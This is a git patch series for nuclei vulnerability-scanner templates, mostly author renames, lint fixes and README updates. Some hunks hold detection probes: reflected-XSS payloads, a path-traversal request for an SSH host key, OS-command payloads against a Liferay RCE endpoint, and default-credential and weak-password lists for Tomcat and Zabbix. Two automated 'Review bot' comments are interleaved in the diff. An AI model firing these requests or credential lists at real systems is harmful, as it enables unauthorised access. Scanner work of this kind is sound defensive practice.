id: opcache-status-exposure info: name: OPcache Status Exposure - author: Ice3man + author: pd-team severity: low requests: diff --git a/exposures/configs/perl-status.yaml b/exposures/configs/perl-status.yaml index 6e65332db7..b19c7cbce7 100755 --- a/exposures/configs/perl-status.yaml +++ b/exposures/configs/perl-status.yaml @@ -2,7 +2,7 @@ id: perl-status info: name: Apache mod_perl Status Page Exposure - author: Ice3man + author: pd-team severity: medium requests: diff --git a/exposures/configs/rails-database-config.yaml b/exposures/configs/rails-database-config.yaml index 4461c3b86b..a957dc27f2 100644 --- a/exposures/configs/rails-database-config.yaml +++ b/exposures/configs/rails-database-config.yaml @@ -2,7 +2,7 @@ id: rails-database-config info: name: Ruby-on-Rails Database Configuration Exposure - author: Ice3man + author: pd-team severity: low requests: 
diff --git a/exposures/configs/symfony-database-config.yaml b/exposures/configs/symfony-database-config.yaml index b116547087..a524f9c594 100755 --- a/exposures/configs/symfony-database-config.yaml +++ b/exposures/configs/symfony-database-config.yaml @@ -2,7 +2,7 @@ id: symfony-database-config info: name: Symfony Database Configuration Exposure - author: Ice3man + author: pd-team severity: high requests: diff --git a/exposures/configs/symfony-profiler.yaml b/exposures/configs/symfony-profiler.yaml index 6b7b9d5810..f7f9b55c4f 100644 --- a/exposures/configs/symfony-profiler.yaml +++ b/exposures/configs/symfony-profiler.yaml @@ -2,7 +2,7 @@ id: symfony-profiler info: name: Symfony Profiler - author: ice3man + author: pd-team severity: high requests: diff --git a/exposures/logs/rails-debug-mode.yaml b/exposures/logs/rails-debug-mode.yaml index f696b5ce6c..911965ae65 100644 --- a/exposures/logs/rails-debug-mode.yaml +++ b/exposures/logs/rails-debug-mode.yaml @@ -2,7 +2,7 @@ id: rails-debug-mode info: name: Rails Debug Mode Enabled - author: ice3man + author: pd-team severity: medium requests: diff --git a/exposures/logs/struts-debug-mode.yaml b/exposures/logs/struts-debug-mode.yaml index 0ec3c41f8e..70aab59bc4 100644 --- a/exposures/logs/struts-debug-mode.yaml +++ b/exposures/logs/struts-debug-mode.yaml @@ -2,7 +2,7 @@ id: struts-debug-mode info: name: Apache Struts setup in Debug-Mode - author: Ice3man + author: pd-team severity: low requests: diff --git a/misconfiguration/airflow-api-exposure.yaml b/misconfiguration/airflow-api-exposure.yaml index 0efc1b2c65..4416e443ff 100755 --- a/misconfiguration/airflow-api-exposure.yaml +++ b/misconfiguration/airflow-api-exposure.yaml @@ -2,7 +2,7 @@ id: airflow-api-exposure info: name: Apache Airflow API Exposure / Unauthenticated Access - author: Ice3man + author: pd-team severity: medium requests: diff --git a/misconfiguration/hadoop-unauth.yaml b/misconfiguration/hadoop-unauth.yaml index 825453b763..a034f23851 100644 
--- a/misconfiguration/hadoop-unauth.yaml +++ b/misconfiguration/hadoop-unauth.yaml @@ -2,7 +2,7 @@ id: hadoop-unauth info: name: Apache Hadoop Unauth - author: Ice3man + author: pd-team severity: low requests: diff --git a/vulnerabilities/other/acme-xss.yaml b/vulnerabilities/other/acme-xss.yaml index 5a5e4e8ef5..21d9d0e5d9 100755 --- a/vulnerabilities/other/acme-xss.yaml +++ b/vulnerabilities/other/acme-xss.yaml @@ -2,7 +2,7 @@ id: acme-xss info: name: ACME / Let's Encrypt Reflected XSS - author: Ice3man + author: pd-team severity: low requests: diff --git a/vulnerabilities/other/aspnuke-openredirect.yaml b/vulnerabilities/other/aspnuke-openredirect.yaml index cef9244755..08503a9b4d 100644 --- a/vulnerabilities/other/aspnuke-openredirect.yaml +++ b/vulnerabilities/other/aspnuke-openredirect.yaml @@ -1,7 +1,8 @@ id: aspnuke-openredirect + info: name: ASP-Nuke Open Redirect - author: Ice3man + author: pd-team severity: low requests: diff --git a/vulnerabilities/other/yarn-resourcemanager-rce.yaml b/vulnerabilities/other/yarn-resourcemanager-rce.yaml index ddc7fc4c4c..7742c5a40e 100755 --- a/vulnerabilities/other/yarn-resourcemanager-rce.yaml +++ b/vulnerabilities/other/yarn-resourcemanager-rce.yaml @@ -2,7 +2,7 @@ id: yarn-resourcemanager-rce info: name: Apache Yarn ResourceManager RCE - author: Ice3man + author: pd-team severity: low requests: From f2f7ada0ffdf6053b1a3d7cc4af252b38f633676 Mon Sep 17 00:00:00 2001 From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com> Date: Sun, 10 Jan 2021 19:46:50 +0530 Subject: [PATCH 31/85] few more updates --- dns/cname-service-detector.yaml | 2 +- dns/servfail-refused-hosts.yaml | 2 +- exposed-panels/citrix-vpn-detect.yaml | 2 +- exposed-panels/parallels-html-client.yaml | 2 +- exposed-panels/phpmyadmin-panel.yaml | 2 +- exposures/configs/phpinfo.yaml | 2 +- exposures/configs/server-status-localhost.yaml | 2 +- misconfiguration/jkstatus-manager.yaml | 2 +- 8 files changed, 8 insertions(+), 8 deletions(-) 
diff --git a/dns/cname-service-detector.yaml b/dns/cname-service-detector.yaml index ae512f5426..2e68cb7bf3 100644 --- a/dns/cname-service-detector.yaml +++ b/dns/cname-service-detector.yaml @@ -2,7 +2,7 @@ id: cname-service-detector info: name: 3rd party service checker - author: bauthard + author: pd-team severity: info dns: diff --git a/dns/servfail-refused-hosts.yaml b/dns/servfail-refused-hosts.yaml index 2bcf3e5844..fe7781fa91 100644 --- a/dns/servfail-refused-hosts.yaml +++ b/dns/servfail-refused-hosts.yaml @@ -2,7 +2,7 @@ id: servfail-refused-hosts info: name: Servfail Host Finder - author: mzack9999 + author: pd-team severity: info dns: diff --git a/exposed-panels/citrix-vpn-detect.yaml b/exposed-panels/citrix-vpn-detect.yaml index 96c7e2071e..7ce6621e15 100644 --- a/exposed-panels/citrix-vpn-detect.yaml +++ b/exposed-panels/citrix-vpn-detect.yaml @@ -2,7 +2,7 @@ id: citrix-vpn-detect info: name: Citrix VPN Detection - author: bauthard + author: pd-team severity: info requests: diff --git a/exposed-panels/parallels-html-client.yaml b/exposed-panels/parallels-html-client.yaml index 3e436e4e34..4602cc5ce4 100644 --- a/exposed-panels/parallels-html-client.yaml +++ b/exposed-panels/parallels-html-client.yaml @@ -2,7 +2,7 @@ id: parallels-html-client info: name: Parallels HTML5 Client - author: bauthard + author: pd-team severity: info requests: diff --git a/exposed-panels/phpmyadmin-panel.yaml b/exposed-panels/phpmyadmin-panel.yaml index 93a1badb12..f8ce001dc1 100644 --- a/exposed-panels/phpmyadmin-panel.yaml +++ b/exposed-panels/phpmyadmin-panel.yaml @@ -2,7 +2,7 @@ id: phpmyadmin-panel info: name: phpMyAdmin Panel - author: bauthard + author: pd-team severity: info requests: diff --git a/exposures/configs/phpinfo.yaml b/exposures/configs/phpinfo.yaml index 61cd1b1dc6..7836d74b54 100644 --- a/exposures/configs/phpinfo.yaml +++ b/exposures/configs/phpinfo.yaml 
@@ -2,7 +2,7 @@ id: phpinfo-files info: name: phpinfo Disclosure - author: bauthard + author: pd-team severity: low requests: diff --git a/exposures/configs/server-status-localhost.yaml b/exposures/configs/server-status-localhost.yaml index 1482d55fec..f5916e1911 100644 --- a/exposures/configs/server-status-localhost.yaml +++ b/exposures/configs/server-status-localhost.yaml @@ -2,7 +2,7 @@ id: server-status-localhost info: name: Server Status Disclosure - author: bauthard & geeknik + author: pd-team & geeknik severity: low requests: diff --git a/misconfiguration/jkstatus-manager.yaml b/misconfiguration/jkstatus-manager.yaml index 06deaae295..53669fd626 100644 --- a/misconfiguration/jkstatus-manager.yaml +++ b/misconfiguration/jkstatus-manager.yaml @@ -2,7 +2,7 @@ id: jkstatus-manager info: name: JK Status Manager - author: bauthard + author: pd-team severity: low requests: From 32efba63f772e6f50ab41b53dfb6b534d7ad568b Mon Sep 17 00:00:00 2001 From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com> Date: Sun, 10 Jan 2021 20:25:57 +0530 Subject: [PATCH 32/85] few more changes --- exposed-panels/active-admin-exposure.yaml | 2 +- exposed-panels/adminer-exposure.yaml | 125 ---------------------- exposed-panels/atlassian-crowd-panel.yaml | 1 + exposed-panels/webmin-panel.yaml | 1 - 4 files changed, 2 insertions(+), 127 deletions(-) delete mode 100755 exposed-panels/adminer-exposure.yaml diff --git a/exposed-panels/active-admin-exposure.yaml b/exposed-panels/active-admin-exposure.yaml index 75933eb847..5584c76461 100755 --- a/exposed-panels/active-admin-exposure.yaml +++ b/exposed-panels/active-admin-exposure.yaml @@ -3,7 +3,7 @@ id: active-admin-exposure info: name: ActiveAdmin Admin Dasboard Exposure author: pd-team - severity: medium + severity: info requests: - method: GET diff --git a/exposed-panels/adminer-exposure.yaml b/exposed-panels/adminer-exposure.yaml deleted file mode 100755 index 265940f3ea..0000000000 
--- a/exposed-panels/adminer-exposure.yaml +++ /dev/null 
@@ -1,125 +0,0 @@ -id: adminer-exposure - -info: - name: Adminer Exposure - author: pd-team - severity: medium - -requests: - - method: GET - path: - - '{{BaseURL}}/adminer-4.7.0.php' - - '{{BaseURL}}/adminer-4.6.0-mysql-en.php' - - '{{BaseURL}}/adminer/adminer.php' - - '{{BaseURL}}/adminer-4.6.0-en.php' - - '{{BaseURL}}/adminer-4.6.2-mysql.php' - - '{{BaseURL}}/adminer-4.6.1-mysql.php' - - '{{BaseURL}}/adminer-4.7.2.php' - - '{{BaseURL}}/adminer-4.0.1/' - - '{{BaseURL}}/adminer-4.6.3-mysql-en.php' - - '{{BaseURL}}/adminer-4.3.1-mysql-en.php' - - '{{BaseURL}}/adminer-3.3.1/' - - '{{BaseURL}}/adminer-3.6.1/' - - '{{BaseURL}}/adminer-4.6.2.php' - - '{{BaseURL}}/adminer-4.0.3.php' - - '{{BaseURL}}/adminer-4.3.0.php' - - '{{BaseURL}}/adminer-4.6.1.php' - - '{{BaseURL}}/adminer-4.2.5-en.php' - - '{{BaseURL}}/data/adminer.php' - - '{{BaseURL}}/adminer/index.php' - - '{{BaseURL}}/adminer-4.2.0.php' - - '{{BaseURL}}/adminer-4.5.0-mysql.php' - - '{{BaseURL}}/admin/adminer.php' - - '{{BaseURL}}/adminer-4.7.2-mysql.php' - - '{{BaseURL}}/adminer-4.2.2/' - - '{{BaseURL}}/adminer-4.5.0.php' - - '{{BaseURL}}/adminer-3.6.0/' - - '{{BaseURL}}/webadminer.php' - - '{{BaseURL}}/adminer-4.0.3/' - - '{{BaseURL}}/adminer-4.1.0.php' - - '{{BaseURL}}/adminer-3.3.2/' - - '{{BaseURL}}/adminer-4.6.2-en.php' - - '{{BaseURL}}/adminer-4.7.1-mysql.php' - - '{{BaseURL}}/public/adminer.php' - - '{{BaseURL}}/adminer-4.1.0/' - - '{{BaseURL}}/adminer-4.5.0-en.php' - - '{{BaseURL}}/adminer-4.2.4/' - - '{{BaseURL}}/adminer-4.6.2-mysql-en.php' - - '{{BaseURL}}/adminer.php' - - '{{BaseURL}}/adminer-4.7.0-mysql-en.php' - - '{{BaseURL}}/adminer-4.4.0-mysql.php' - - '{{BaseURL}}/adminer-4.3.1.php' - - '{{BaseURL}}/adminer-4.6.0-mysql.php' - - '{{BaseURL}}/adminer-4.2.3/' - - '{{BaseURL}}/_adminer.php' - - '{{BaseURL}}/adminer-3.3.3/' - - '{{BaseURL}}/adminer-3.3.0/' - - '{{BaseURL}}/php/adminer.php' - - '{{BaseURL}}/adminer-3.1.0/' - - '{{BaseURL}}/adminer-4.6.3-mysql.php' - - 
'{{BaseURL}}/adminer-4.7.2-mysql-en.php' - - '{{BaseURL}}/adminer-4.4.0-en.php' - - '{{BaseURL}}/publicadminer.php' - - '{{BaseURL}}/adminer1.php' - - '{{BaseURL}}/adminer-4.7.3-mysql.php' - - '{{BaseURL}}/adminer-4.6.3-en.php' - - '{{BaseURL}}/adminer-4.2.5-mysql-en.php' - - '{{BaseURL}}/adminer-3.0.0/' - - '{{BaseURL}}/adminer-3.5.0/' - - '{{BaseURL}}/adminer-3.6.4/' - - '{{BaseURL}}/adminer-4.7.3-mysql-en.php' - - '{{BaseURL}}/adminer-3.2.2/' - - '{{BaseURL}}/adminer-3.0.1/' - - '{{BaseURL}}/tools/adminer.php' - - '{{BaseURL}}/adminer-4.7.1.php' - - '{{BaseURL}}/adminer-4.0.3-mysql.php' - - '{{BaseURL}}/adminer-4.2.5-mysql.php' - - '{{BaseURL}}/adminer-3.5.1/' - - '{{BaseURL}}/adminer-3.6.3/' - - '{{BaseURL}}/adminer-4.3.0-mysql-en.php' - - '{{BaseURL}}/web/adminer.php' - - '{{BaseURL}}/adminer-3.2.1/' - - '{{BaseURL}}/adminer/' - - '{{BaseURL}}/adminer-4.6.2-cs.php' - - '{{BaseURL}}/adminer-4.2.0-mysql.php' - - '{{BaseURL}}/adminer-4.5.0-mysql-en.php' - - '{{BaseURL}}/adminer-4.3.1-mysql.php' - - '{{BaseURL}}/adminer-4.1.0-mysql.php' - - '{{BaseURL}}/adminer-4.7.1-mysql-en.php' - - '{{BaseURL}}/adminer-4.3.1-en.php' - - '{{BaseURL}}/adminer-4.7.0-en.php' - - '{{BaseURL}}/adminer-4.6.1-mysql-en.php' - - '{{BaseURL}}/adminer-4.7.2-en.php' - - '{{BaseURL}}/adminer-4.2.0/' - - '{{BaseURL}}/adminer-3.6.2/' - - '{{BaseURL}}/adminer-4.4.0-mysql-en.php' - - '{{BaseURL}}/toolsadminer.php' - - '{{BaseURL}}/adminer-3.7.0/' - - '{{BaseURL}}/adminer-4.2.5.php' - - '{{BaseURL}}/adminer-3.2.0/' - - '{{BaseURL}}/adminer-4.4.0.php' - - '{{BaseURL}}/adminer-4.7.3.php' - - '{{BaseURL}}/adminer-4.3.0-en.php' - - '{{BaseURL}}/adminer-4.6.3.php' - - '{{BaseURL}}/adminer-4.0.2/' - - '{{BaseURL}}/wp-content/plugins/adminer/adminer.php' - - '{{BaseURL}}/adminer-3.4.0/' - - '{{BaseURL}}/adminer-4.0.0/' - - '{{BaseURL}}/adminer-4.7.1-en.php' - - '{{BaseURL}}/adminer-4.3.0-mysql.php' - - '{{BaseURL}}/adminer-4.2.1/' - - '{{BaseURL}}/adminer-4.6.0.php' - - '{{BaseURL}}/adminer-3.7.1/' - - 
'{{BaseURL}}/adminadminer.php' - - '{{BaseURL}}/adminer-3.3.4/' - - '{{BaseURL}}/adminer-4.6.1-en.php' - - '{{BaseURL}}/adminer-4.7.3-en.php' - - '{{BaseURL}}/adminer-4.7.0-mysql.php' - matchers-condition: and - matchers: - - type: word - words: - - "Login - Adminer" - - type: status - status: - - 200 diff --git a/exposed-panels/atlassian-crowd-panel.yaml b/exposed-panels/atlassian-crowd-panel.yaml index c2f2c4aa9d..6b6d3e01f3 100644 --- a/exposed-panels/atlassian-crowd-panel.yaml +++ b/exposed-panels/atlassian-crowd-panel.yaml @@ -1,4 +1,5 @@ id: atlassian-crowd-panel + info: name: Atlassian Crowd panel detect author: organiccrap diff --git a/exposed-panels/webmin-panel.yaml b/exposed-panels/webmin-panel.yaml index 179d36e3fd..ef6329dbed 100644 --- a/exposed-panels/webmin-panel.yaml +++ b/exposed-panels/webmin-panel.yaml @@ -10,7 +10,6 @@ requests: path: - "{{BaseURL}}/" - "{{BaseURL}}/webmin/" - - "{{BaseURL}}:10000/" redirects: true matchers: - type: word From 8a12488c3241fffd9094112d6bdf7a7a4b44758d Mon Sep 17 00:00:00 2001 From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com> Date: Sun, 10 Jan 2021 20:33:44 +0530 Subject: [PATCH 33/85] moving folders --- default-logins/{ => ambari}/ambari-default-credentials.yaml | 0 default-logins/{ => ofbiz}/ofbiz-default-credentials.yaml | 0 default-logins/{ => zabbix}/zabbix-default-credentials.yaml | 0 3 files changed, 0 insertions(+), 0 deletions(-) rename default-logins/{ => ambari}/ambari-default-credentials.yaml (100%) rename default-logins/{ => ofbiz}/ofbiz-default-credentials.yaml (100%) rename default-logins/{ => zabbix}/zabbix-default-credentials.yaml (100%) diff --git a/default-logins/ambari-default-credentials.yaml b/default-logins/ambari/ambari-default-credentials.yaml similarity index 100% rename from default-logins/ambari-default-credentials.yaml rename to default-logins/ambari/ambari-default-credentials.yaml 
diff --git a/default-logins/ofbiz-default-credentials.yaml b/default-logins/ofbiz/ofbiz-default-credentials.yaml similarity index 100% rename from default-logins/ofbiz-default-credentials.yaml rename to default-logins/ofbiz/ofbiz-default-credentials.yaml diff --git a/default-logins/zabbix-default-credentials.yaml b/default-logins/zabbix/zabbix-default-credentials.yaml similarity index 100% rename from default-logins/zabbix-default-credentials.yaml rename to default-logins/zabbix/zabbix-default-credentials.yaml From b80ca7732d243d1200e63949df934a5c69273df8 Mon Sep 17 00:00:00 2001 From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com> Date: Mon, 11 Jan 2021 03:31:24 +0530 Subject: [PATCH 34/85] linting errors --- default-logins/activemq/activemq-default-login.yaml | 2 +- vulnerabilities/other/acme-xss.yaml | 5 +++-- 2 files changed, 4 insertions(+), 3 deletions(-) diff --git a/default-logins/activemq/activemq-default-login.yaml b/default-logins/activemq/activemq-default-login.yaml index fb1f8264f8..6107ee0961 100644 --- a/default-logins/activemq/activemq-default-login.yaml +++ b/default-logins/activemq/activemq-default-login.yaml @@ -18,5 +18,5 @@ requests: - '

Broker

' condition: and - # We could add a request condition block to only send this request if the + # We could add a request condition block to only send this request if the # site response URL had activeMQ broker stuff in the source. diff --git a/vulnerabilities/other/acme-xss.yaml b/vulnerabilities/other/acme-xss.yaml index 21d9d0e5d9..cf0a4bb769 100755 --- a/vulnerabilities/other/acme-xss.yaml +++ b/vulnerabilities/other/acme-xss.yaml @@ -9,12 +9,13 @@ requests: - method: GET path: - '{{BaseURL}}/.well-known/acme-challenge/%3C%3fxml%20version=%221.0%22%3f%3E%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%3Ealert%28document.domain%26%23x29%3B%3C/x:script%3E' + + matchers-condition: and matchers: - type: word words: - "alert(document.domain)" - type: word - words: + words: - "/xml" - "/html" - matchers-condition: and \ No newline at end of file From b5dd30abf5851b301b32adbeff9643bf322dc781 Mon Sep 17 00:00:00 2001 From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com> Date: Mon, 11 Jan 2021 04:09:54 +0530 Subject: [PATCH 35/85] fixes --- cves/2020/CVE-2020-12116.yaml | 14 -------------- cves/2020/CVE-2020-7318.yaml | 10 +++------- cves/2020/CVE-2020-7961.yaml | 7 ++----- default-logins/apache/tomcat-manager-default.yaml | 14 +++++++------- misconfiguration/aem-groovyconsole.yaml | 1 - vulnerabilities/jenkins/jenkins-stack-trace.yaml | 1 - .../jenkins/unauthenticated-jenkin-dashboard.yaml | 3 --- 7 files changed, 12 insertions(+), 38 deletions(-) diff --git a/cves/2020/CVE-2020-12116.yaml b/cves/2020/CVE-2020-12116.yaml index c151685af6..8a9d30a1e8 100644 --- a/cves/2020/CVE-2020-12116.yaml +++ b/cves/2020/CVE-2020-12116.yaml @@ -17,12 +17,6 @@ requests: Accept: */* Connection: close - - | - GET / HTTP/1.1 - Host: {{Hostname}}:8060 - Accept: */* - Connection: close - - | GET endpoint../../../../bin/.ssh_host_rsa_key HTTP/1.1 Host: {{Hostname}} 
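Review bot: The second word matcher in acme-xss.yaml (`/xml`, `/html`) still carries no `part:`, so it is evaluated against the response body rather than the Content-Type header those fragments are evidently meant to check, and with `matchers-condition: and` now hoisted into force the template only fires when the body happens to contain them. Add `part: header` under that matcher, matching what the later `text/html` checks in this series do. I recall body being the engine's default part for word matchers; confirm against the nuclei version in use.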
@@ -31,14 +25,6 @@ requests: Connection: close Referer: http://{{Hostname}} - - | - GET endpoint../../../../bin/.ssh_host_rsa_key HTTP/1.1 - Host: {{Hostname}}:8060 - Accept: */* - Cache-Control: max-age=0 - Connection: close - Referer: http://{{Hostname}}:8060/ - extractors: - type: regex name: endpoint diff --git a/cves/2020/CVE-2020-7318.yaml b/cves/2020/CVE-2020-7318.yaml index 84aad2501b..d29ca52b32 100644 --- a/cves/2020/CVE-2020-7318.yaml +++ b/cves/2020/CVE-2020-7318.yaml @@ -14,16 +14,12 @@ info: - https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/ requests: - - payloads: - port: - - "80" - - "443" - - "8443" - raw: + - raw: - | GET /PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E HTTP/1.1 - Host: {{Hostname}}:§port§ + Host: {{Hostname}} Connection: close + matchers-condition: and matchers: - type: status diff --git a/cves/2020/CVE-2020-7961.yaml b/cves/2020/CVE-2020-7961.yaml index 37212b88b1..00be0fad26 100644 --- a/cves/2020/CVE-2020-7961.yaml +++ b/cves/2020/CVE-2020-7961.yaml @@ -18,15 +18,12 @@ requests: - "systeminfo" # Windows - "lsb_release -a" # Linux - "sysctl kern.ostype" # macOS - port: - - "80" - - "443" - - "8080" + attack: sniper raw: - | POST /api/jsonws/invoke HTTP/1.1 - Host: {{Hostname}}:§port§ + Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 Content-Length: 4938 Accept: */* diff --git a/default-logins/apache/tomcat-manager-default.yaml b/default-logins/apache/tomcat-manager-default.yaml index 1c93bbd828..d25c590171 100644 --- a/default-logins/apache/tomcat-manager-default.yaml +++ b/default-logins/apache/tomcat-manager-default.yaml 
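Review bot: With `attack: sniper` substituting three commands of different length (`systeminfo`, `lsb_release -a`, `sysctl kern.ostype`) into the request in CVE-2020-7961.yaml, the hard-coded `Content-Length: 4938` kept in the raw block can agree with the actual body for at most one of them, assuming the payload lands in the body, which lies outside this hunk. If the engine recomputes the length for raw requests the header is dead weight; if it sends it verbatim, two of the three requests go out with a wrong length. Either way the safer edit is to drop the `Content-Length: 4938` line and let the engine derive it. The raw request continues past the end of the hunk.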
@@ -8,15 +8,15 @@ requests: - payloads: username: - - admin + - admin password: - - admin - - guest - - password - - test - - 12345 - - 123456 + - admin + - guest + - password + - test + - 12345 + - 123456 attack: clusterbomb # Available options: sniper, pitchfork and clusterbomb diff --git a/misconfiguration/aem-groovyconsole.yaml b/misconfiguration/aem-groovyconsole.yaml index dfcbf4c4a6..42fe2cd71e 100644 --- a/misconfiguration/aem-groovyconsole.yaml +++ b/misconfiguration/aem-groovyconsole.yaml @@ -13,7 +13,6 @@ requests: - "{{BaseURL}}/groovyconsole" headers: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,hi;q=0.8 User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Mobile Safari/537.36 diff --git a/vulnerabilities/jenkins/jenkins-stack-trace.yaml b/vulnerabilities/jenkins/jenkins-stack-trace.yaml index c55c472c61..b59ac27ad3 100644 --- a/vulnerabilities/jenkins/jenkins-stack-trace.yaml +++ b/vulnerabilities/jenkins/jenkins-stack-trace.yaml @@ -14,7 +14,6 @@ requests: headers: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,hi;q=0.8 User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Mobile Safari/537.36 diff --git a/vulnerabilities/jenkins/unauthenticated-jenkin-dashboard.yaml b/vulnerabilities/jenkins/unauthenticated-jenkin-dashboard.yaml index 2ef759e29c..9a9e8fcb1b 100644 --- a/vulnerabilities/jenkins/unauthenticated-jenkin-dashboard.yaml +++ b/vulnerabilities/jenkins/unauthenticated-jenkin-dashboard.yaml 
@@ -9,9 +9,6 @@ requests: - method: GET path: - "{{BaseURL}}" - - "{{BaseURL}}:8080" - - "{{BaseURL}}:9090" - - "{{BaseURL}}:8888" matchers-condition: and matchers: From d393389ecfbaeb0eb3ae20125060c0117e8b5d20 Mon Sep 17 00:00:00 2001 From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com> Date: Mon, 11 Jan 2021 04:11:44 +0530 Subject: [PATCH 36/85] Update zabbix-default-credentials.yaml --- default-logins/zabbix/zabbix-default-credentials.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/default-logins/zabbix/zabbix-default-credentials.yaml b/default-logins/zabbix/zabbix-default-credentials.yaml index 7bbdf1d241..05b267ef73 100755 --- a/default-logins/zabbix/zabbix-default-credentials.yaml +++ b/default-logins/zabbix/zabbix-default-credentials.yaml @@ -10,8 +10,8 @@ requests: path: - '{{BaseURL}}/index.php' headers: - - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - - X-Requested-With: XMLHttpRequest + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-Requested-With: XMLHttpRequest body: name=Admin&password=zabbix&autologin=1&enter=Sign+in matchers-condition: and From 6beee02685cf15710f0b42188ae7d41908a43dc7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 10 Jan 2021 22:46:55 +0000 Subject: [PATCH 37/85] Auto Update README [Sun Jan 10 22:46:55 UTC 2021] :robot: --- README.md | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 5e467fbb7d..20a58c714c 100644 --- a/README.md +++ b/README.md 
@@ -16,7 +16,7 @@ An overview of the nuclei template directory including number of templates and H | Templates | Counts | Templates | Counts | | ------------------ | -------------------------------- | ------------------------- | --------------------------------------- | | cves | 147 | files | 51 | -| vulnerabilities | 42 | panels | 50 | +| vulnerabilities | 43 | panels | 50 | | technologies | 41 | security-misconfiguration | 29 | | workflows | 17 | tokens | 8 | | dns | 6 | fuzzing | 6 | @@ -447,6 +447,7 @@ An overview of the nuclei template directory including number of templates and H │   ├── springboot-h2-db-rce.yaml │   ├── symantec-messaging-gateway.yaml │   ├── symfony-debugmode.yaml +│   ├── thinkific-redirect.yaml │   ├── tikiwiki-reflected-xss.yaml │   ├── tomcat-manager-pathnormalization.yaml │   ├── twig-php-ssti.yaml @@ -484,7 +485,7 @@ An overview of the nuclei template directory including number of templates and H -**24 directories, 425 files**. +**24 directories, 426 files**. Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to build new and your own custom templates and many example templates for easy understanding. From 9ab927f60c4e11d06a7e29241c5e5d5165e29b35 Mon Sep 17 00:00:00 2001 From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com> Date: Mon, 11 Jan 2021 04:24:00 +0530 Subject: [PATCH 38/85] lint fixes --- default-logins/apache/tomcat-manager-default.yaml | 14 +++++++------- .../zabbix/zabbix-default-credentials.yaml | 5 +++-- exposures/configs/composer-config.yaml | 2 +- 3 files changed, 11 insertions(+), 10 deletions(-) diff --git a/default-logins/apache/tomcat-manager-default.yaml b/default-logins/apache/tomcat-manager-default.yaml index d25c590171..1c93bbd828 100644 --- a/default-logins/apache/tomcat-manager-default.yaml +++ b/default-logins/apache/tomcat-manager-default.yaml 
@@ -8,15 +8,15 @@ requests: - payloads: username: - - admin + - admin password: - - admin - - guest - - password - - test - - 12345 - - 123456 + - admin + - guest + - password + - test + - 12345 + - 123456 attack: clusterbomb # Available options: sniper, pitchfork and clusterbomb diff --git a/default-logins/zabbix/zabbix-default-credentials.yaml b/default-logins/zabbix/zabbix-default-credentials.yaml index 05b267ef73..c876466114 100755 --- a/default-logins/zabbix/zabbix-default-credentials.yaml +++ b/default-logins/zabbix/zabbix-default-credentials.yaml @@ -10,8 +10,9 @@ requests: path: - '{{BaseURL}}/index.php' headers: - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - X-Requested-With: XMLHttpRequest + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-Requested-With: XMLHttpRequest + body: name=Admin&password=zabbix&autologin=1&enter=Sign+in matchers-condition: and diff --git a/exposures/configs/composer-config.yaml b/exposures/configs/composer-config.yaml index 9db5816cfd..b3a9afeebb 100644 --- a/exposures/configs/composer-config.yaml +++ b/exposures/configs/composer-config.yaml @@ -1,4 +1,4 @@ -id: development-config-file +id: composer-config info: name: composer-config-file From d69ce217e81fbba708600f730afbedc5afa958d6 Mon Sep 17 00:00:00 2001 From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com> Date: Mon, 11 Jan 2021 04:50:14 +0530 Subject: [PATCH 39/85] fixes --- exposed-tokens/generic/credentials-disclosure.yaml | 7 ++++++- exposed-tokens/generic/general-tokens.yaml | 11 ++++++++--- exposed-tokens/generic/http-username-password.yaml | 4 +++- exposures/apis/swagger-api.yaml | 2 +- misconfiguration/unauthenticated-nacos-access.yaml | 6 +++--- 5 files changed, 21 insertions(+), 9 deletions(-) diff --git a/exposed-tokens/generic/credentials-disclosure.yaml b/exposed-tokens/generic/credentials-disclosure.yaml index 8b1abf976c..8b6e1cb008 100644 --- a/exposed-tokens/generic/credentials-disclosure.yaml 
+++ b/exposed-tokens/generic/credentials-disclosure.yaml @@ -5,10 +5,15 @@ id: credentials-disclosure # Severity is not fixed in this case, it varies from none to critical depending upon impact of disclosed key/tokes. # Regex count:- 687 +# Notes:- +# This template requires manual inspection once found valid match. +# Generic token could be anything matching below regex. +# Impact of leaked token depends on validation of leaked token. + info: name: Credentials Disclosure Check author: Sy3Omda - severity: medium + severity: info description: Look for multiple keys/tokens/passwords in the page response. requests: diff --git a/exposed-tokens/generic/general-tokens.yaml b/exposed-tokens/generic/general-tokens.yaml index 3923983575..2fbd5e12ea 100644 --- a/exposed-tokens/generic/general-tokens.yaml +++ b/exposed-tokens/generic/general-tokens.yaml @@ -1,15 +1,20 @@ -id: general-tokens +id: generic-tokens info: - name: General Tokens + name: Generic Tokens author: nadino - severity: 